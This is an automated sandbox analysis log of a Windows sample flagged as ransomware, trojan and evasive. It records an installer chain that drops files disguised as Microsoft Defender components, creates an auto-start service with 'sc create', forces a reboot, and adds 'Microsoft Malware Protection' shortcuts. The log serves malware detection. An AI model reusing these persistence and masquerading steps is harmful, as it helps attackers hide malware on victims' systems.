          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: uiautomationcore.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: resourcepolicyclient.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: dxcore.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: sxs.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Section loaded: explorerframe.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: mpsvc.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: netapi32.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: textshaping.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: dwmapi.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: propsys.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: edputil.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: wintypes.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: appresolver.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: bcp47langs.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: slc.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: userenv.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: sppc.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: pcacli.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: sfc_os.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: mpsvc.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: netapi32.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: textshaping.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: dwmapi.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: propsys.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: edputil.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: wintypes.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: appresolver.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: bcp47langs.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: slc.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: userenv.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: sppc.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\shutdown.exe Section loaded: shutdownext.dll
          Source: C:\Windows\SysWOW64\shutdown.exe Section loaded: sspicli.dll
          Source: 0219830219301290321012notas.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 0219830219301290321012notas.exe Static PE information: Section: .rsrc ZLIB complexity 0.9935229745216583
          Source: MpCmdRun.exe0.7.dr Binary string: kernelbase.dllRaiseFailFastException%wswilstd::exception: %hsonecore\internal\sdk\inc\wil\opensource\wil\resource.h_p0WilError_03Bad optional accessamcore\antimalware\source\service\tools\mpcmdtool\mpperformancereport.cppProcessIdReasonPID\\?\\Device\\drivers\\FI_UNKNOWNerror: invalid data: System path changed during the trace from "%ls" to "%ls"
          Source: classification engine Classification label: mal76.rans.troj.evad.winEXE@15/77@1/1
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_00221050 FindResourceW,LoadResource, 0_2_00221050
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe File created: C:\Program Files (x86)\Microsoft.NET\base
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe File created: C:\Users\user\AppData\Local\ContentPack
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_03
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe File created: C:\Users\user\AppData\Local\Temp\.squirrel-lock-68A44D3AD842D31101CEB3665791DCFE494869E5
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Command line argument: kernel32.dll 0_2_00227326
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Command line argument: --checkInstall 0_2_00227326
          Source: 0219830219301290321012notas.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: 0219830219301290321012notas.exe ReversingLabs: Detection: 15%
          Source: 0219830219301290321012notas.exe Virustotal: Detection: 16%
          Source: 0219830219301290321012notas.exe String found in binary or memory: "%s" --install . %s
          Source: 0219830219301290321012notas.exe String found in binary or memory: DeploymentTool.exe\need dictionaryinvalid literal/length codeinvalid distance codeinvalid block typeinvalid stored block lengthstoo many length or distance symbolsinvalid bit length repeatoversubscribed dynamic bit lengths treeincomplete dynamic bit lengths treeoversubscribed literal/length treeincomplete literal/length treeoversubscribed distance treeincomplete distance treeempty distance tree with lengthsunknown compression methodinvalid window sizeincorrect header checkincorrect data check\..\\..//..//..\UT%s%s%s%s%sOpen Setup LogCloseInstallation has failedSquirrelSQUIRREL_TEMP%s%s\%sUnable to write to %s - IT policies may be restricting access to this folder\SquirrelTemp%s\SquirrelSetup.logDATAUpdate.exe"%s" --install . %sThere was an error while installing the application. Check the setup log for more information and contact the author.Failed to extract installervector<T> too longi
          Source: Update.exe String found in binary or memory: b=|baseUrl={Provides a base URL to prefix the RELEASES file packages with-a=|process-start-args=iArguments that will be used when starting executable-l=|shortcut-locations=
          Source: Update.exe String found in binary or memory: ((?=^[ ]{{0,{0}}}[^ \t\n])|\Z) # Lookahead for non-space at line-start, or end of doc
          Source: Update.exe String found in binary or memory: onError%Downloading file: 1Failed downloading URL: #Downloading url: 1Failed to download url: !squirrel-install3Starting automatic update7Failed to check for updates5Failed to download updates/Failed to apply updates9Failed to set up uninstaller){0} {1}{2} {3} # {4}
          Source: Update.exe String found in binary or memory: Scanning {0}mIgnoring {0} as the target framework is not compatible%Writing {0} to {1}UCouldn't find file for package in {1}: {0}%--squirrel-install%--squirrel-updated'--squirrel-obsolete)--squirrel-uninstall'--squirrel-firstrunAFailed to handle Squirrel events[\StringFileInfo\040904B0\SquirrelAwareVersion)SquirrelAwareVersion;Failed to promote Tray icon:
          Source: Update.exe String found in binary or memory: ..\Update.exegUpdate.exe not found, not a Squirrel-installed app?
          Source: Update.exe String found in binary or memory: update.MNo release to install, running the appIFailed to install package to app dirIFailed to update local releases file;Failed to invoke post-install;Starting fixPinnedExecutables)Fixing up tray icons
          Source: Update.exe String found in binary or memory: -delta.nupkg$iCannot apply combinations of delta and full packagesQCouldn't run Squirrel hook, continuing: ---squirrel-updated {0}---squirrel-install {0}9Squirrel Enabled Apps: [{0}]wNo apps are marked as Squirrel-aware! Going to run them all-Failed to delete key: /--squirrel-obsolete {0}7Couldn't delete directory: QCoudln't run Squirrel hook, continuing: WcleanDeadVersions: checking for version {0}kcleanDeadVersions: exclude current version folder {0}ccleanDeadVersions: exclude new version folder {0}
          Source: unknown Process created: C:\Users\user\Desktop\0219830219301290321012notas.exe C:\Users\user\Desktop\0219830219301290321012notas.exe
          Source: unknown Process created: C:\Users\user\Desktop\0219830219301290321012notas.exe "C:\Users\user\Desktop\0219830219301290321012notas.exe" --rerunningWithoutUAC
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Process created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Process created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" --squirrel-firstrun
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Process created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe"
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Process created: C:\Windows\SysWOW64\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
          Source: C:\Windows\SysWOW64\shutdown.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
          Source: Microsoft Malware Protection.lnk.3.dr LNK file: ..\..\..\..\..\..\Local\ContentPack\BumpFiles.exe
          Source: Microsoft Malware Protection.lnk0.3.dr LNK file: ..\AppData\Local\ContentPack\BumpFiles.exe
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Window found: window name: TMainForm
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentPack
          Source: 0219830219301290321012notas.exe Static file information: File size 2102272 > 1048576
          Source: 0219830219301290321012notas.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1d6600
          Source: 0219830219301290321012notas.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: 0219830219301290321012notas.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: 0219830219301290321012notas.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: 0219830219301290321012notas.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: 0219830219301290321012notas.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: 0219830219301290321012notas.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: 0219830219301290321012notas.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Update.exe, 00000003.00000002.2050601484.000000000328D000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.3.dr
          Source: Binary string: OfflineScannerShell.pdb source: OfflineScannerShell.exe.7.dr
          Source: Binary string: MpAzSubmit.pdb source: MpAzSubmit.dll.7.dr
          Source: Binary string: MpCmdRun.pdbGCTL source: MpCmdRun.exe0.7.dr
          Source: Binary string: netstandard.pdb.mdb source: Update.exe
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: Update.exe, 00000003.00000002.2050601484.0000000003267000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.0000000003245000.00000004.00000800.00020000.00000000.sdmp, BumpFiles.exe0.3.dr
          Source: Binary string: MpDetoursCopyAccelerator.pdb source: MpDetoursCopyAccelerator.dll.7.dr
          Source: Binary string: endpointdlp.pdb source: endpointdlp.dll.7.dr
          Source: Binary string: DefenderCSP.pdb source: DefenderCSP.dll.7.dr
          Source: Binary string: MpCmdRun.pdb source: MpCmdRun.exe0.7.dr
          Source: Binary string: endpointdlp.pdbGCTL source: endpointdlp.dll.7.dr
          Source: Binary string: shellext.pdb source: shellext.dll.7.dr
          Source: Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.7.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: 0219830219301290321012notas.exe
          Source: Binary string: MpAzSubmit.pdbGCTL source: MpAzSubmit.dll.7.dr
          Source: Binary string: ProtectionManagement.pdbGCTL source: ProtectionManagement.dll.7.dr
          Source: Binary string: MpCommu.pdb source: MpCommu.dll.7.dr
          Source: Binary string: MpDetoursCopyAccelerator.pdbGCTL source: MpDetoursCopyAccelerator.dll.7.dr
          Source: Binary string: MpCommu.pdbGCTL source: MpCommu.dll.7.dr
          Source: Binary string: shellext.pdbOGPS source: shellext.dll.7.dr
          Source: Binary string: ProtectionManagement.pdb source: ProtectionManagement.dll.7.dr
          Source: Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.7.dr
          Source: Binary string: MsMpEng.pdb source: Update.exe, 00000003.00000002.2050601484.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000323D000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, BumpFiles.exe, BumpFiles.exe, 00000004.00000002.3857315150.0000000000C11000.00000020.00000001.01000000.00000008.sdmp, BumpFiles.exe, 00000007.00000000.2031196791.0000000000C11000.00000020.00000001.01000000.00000008.sdmp, MsMpEng.exe.7.dr
          Source: Binary string: MsMpEng.pdbGCTL source: MsMpEng.exe.7.dr
          Source: Binary string: OfflineScannerShell.pdbOGPS source: OfflineScannerShell.exe.7.dr
          Source: Binary string: DefenderCSP.pdbGCTL source: DefenderCSP.dll.7.dr
          Source: 0219830219301290321012notas.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: 0219830219301290321012notas.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: 0219830219301290321012notas.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: 0219830219301290321012notas.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: 0219830219301290321012notas.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: NisSrv.exe.7.dr Static PE information: 0xE6D47686 [Fri Sep 19 17:27:34 2092 UTC]
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_00227326 SetDefaultDllDirectories,LoadLibraryW,GetProcAddress,CoInitialize,InitCommonControlsEx,GetModuleHandleW,GetModuleFileNameW, 0_2_00227326
          Source: MpSvc.dll.3.dr Static PE information: section name: .didata
          Source: NisSrv.exe.7.dr Static PE information: section name: .didat
          Source: ProtectionManagement.dll.7.dr Static PE information: section name: .didat
          Source: MpCmdRun.exe.7.dr Static PE information: section name: .didat
          Source: MpCmdRun.exe0.7.dr Static PE information: section name: .didat
          Source: MpClient.dll.7.dr Static PE information: section name: _RDATA
          Source: MpCmdRun.dll.7.dr Static PE information: section name: .didata
          Source: MpCommu.dll.7.dr Static PE information: section name: .didat
          Source: MpRtp.dll.7.dr Static PE information: section name: .didat
          Source: MpSvc.dll.7.dr Static PE information: section name: .didat
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_0022B056 push ecx; ret 0_2_0022B069
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_0023D603 push ecx; ret 0_2_0023D616
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Code function: 3_2_00007FF848E0D2A5 pushad ; iretd 3_2_00007FF848E0D2A6
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Code function: 3_2_00007FF848F200BD pushad ; iretd 3_2_00007FF848F200C1
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_0043D0D8 push ecx; mov dword ptr [esp], eax 4_2_0043D0D9
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_004100B0 push 00410133h; ret 4_2_0041012B
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_0040F344 push ecx; mov dword ptr [esp], edx 4_2_0040F345
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_00407320 push ecx; mov dword ptr [esp], eax 4_2_00407321
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_004245FC push ecx; mov dword ptr [esp], ecx 4_2_00424600
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_0063586C push 006358B2h; ret 4_2_006358AA
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_0040F95C push ecx; mov dword ptr [esp], edx 4_2_0040F95D
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_0040F968 push ecx; mov dword ptr [esp], edx 4_2_0040F969
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_0040F974 push ecx; mov dword ptr [esp], edx 4_2_0040F975
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_0040F9E0 push ecx; mov dword ptr [esp], edx 4_2_0040F9E1
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_0040F9BA push ecx; mov dword ptr [esp], edx 4_2_0040F9BD
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_00425A54 push ecx; mov dword ptr [esp], ecx 4_2_00425A58
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_0040FA02 push ecx; mov dword ptr [esp], edx 4_2_0040FA05
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_00425A18 push ecx; mov dword ptr [esp], ecx 4_2_00425A1B
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_0040FAF4 push ecx; mov dword ptr [esp], edx 4_2_0040FAF5
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_0040FB0C push ecx; mov dword ptr [esp], edx 4_2_0040FB0D
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_004FBC54 push ecx; mov dword ptr [esp], eax4_2_004FBC58
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_004D3CB8 push ecx; mov dword ptr [esp], edx4_2_004D3CB9
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0043FCBC push ecx; mov dword ptr [esp], eax4_2_0043FCBD
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_004FBF8C push ecx; mov dword ptr [esp], eax4_2_004FBF8E
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_0063586C push 006358B2h; ret 7_2_006358AA
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_004FBC54 push ecx; mov dword ptr [esp], eax7_2_004FBC58
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_0043D0D8 push ecx; mov dword ptr [esp], eax7_2_0043D0D9
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_004100B0 push 00410133h; ret 7_2_0041012B
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_0040F344 push ecx; mov dword ptr [esp], edx7_2_0040F345
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_00407320 push ecx; mov dword ptr [esp], eax7_2_00407321
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_004245FC push ecx; mov dword ptr [esp], ecx7_2_00424600
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\vcruntime140.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpRtp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\OfflineScannerShell.exe.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\MsMpRes.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\EppManifest.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\shellext.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpAsDesc.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\MpSvc.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dllJump to dropped file
